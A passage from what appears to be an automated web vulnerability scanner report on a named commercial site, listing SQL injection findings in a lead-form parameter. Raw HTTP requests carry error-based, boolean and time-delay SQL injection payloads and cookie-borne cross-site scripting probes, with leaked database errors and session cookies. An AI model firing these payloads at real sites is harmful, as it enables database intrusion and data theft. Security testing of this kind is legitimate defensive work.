Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:42:01 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.22. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_344_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_344_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR'&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:42:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR''&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:42:04 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.23. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_344_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. The payloads 25510487'%20or%201%3d1--%20 and 25510487'%20or%201%3d2--%20 were each submitted in the attributeId_344_g parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR25510487'%20or%201%3d1--%20&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A6240CD3E62E72A7A802AF6565414F2D; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:40:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=i75r53fukimlp0r4jpiunh67a7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr
...[SNIP]...

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR25510487'%20or%201%3d2--%20&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A6240CD3E62E72A7A802AF6565414F2D; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:40:34 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=7h37vtlnl0eipmaknleb4ef2v6; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61840


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Business Loans, Use InsideUp to Get Quotes and Compare Business Loan Providers </title>
   <meta name="description" content="Let business loan providers compete for your loan needs. Compare local and national business loan companies."/>
   <meta name="keywords" content=" Business Loans "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 15    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, #step_10, #step_11, #step_12, #step_13, #step_14, #step_15, #step_16,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr>
            <td width="175" vali
...[SNIP]...

1.24. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_344_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_344_g parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR'&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
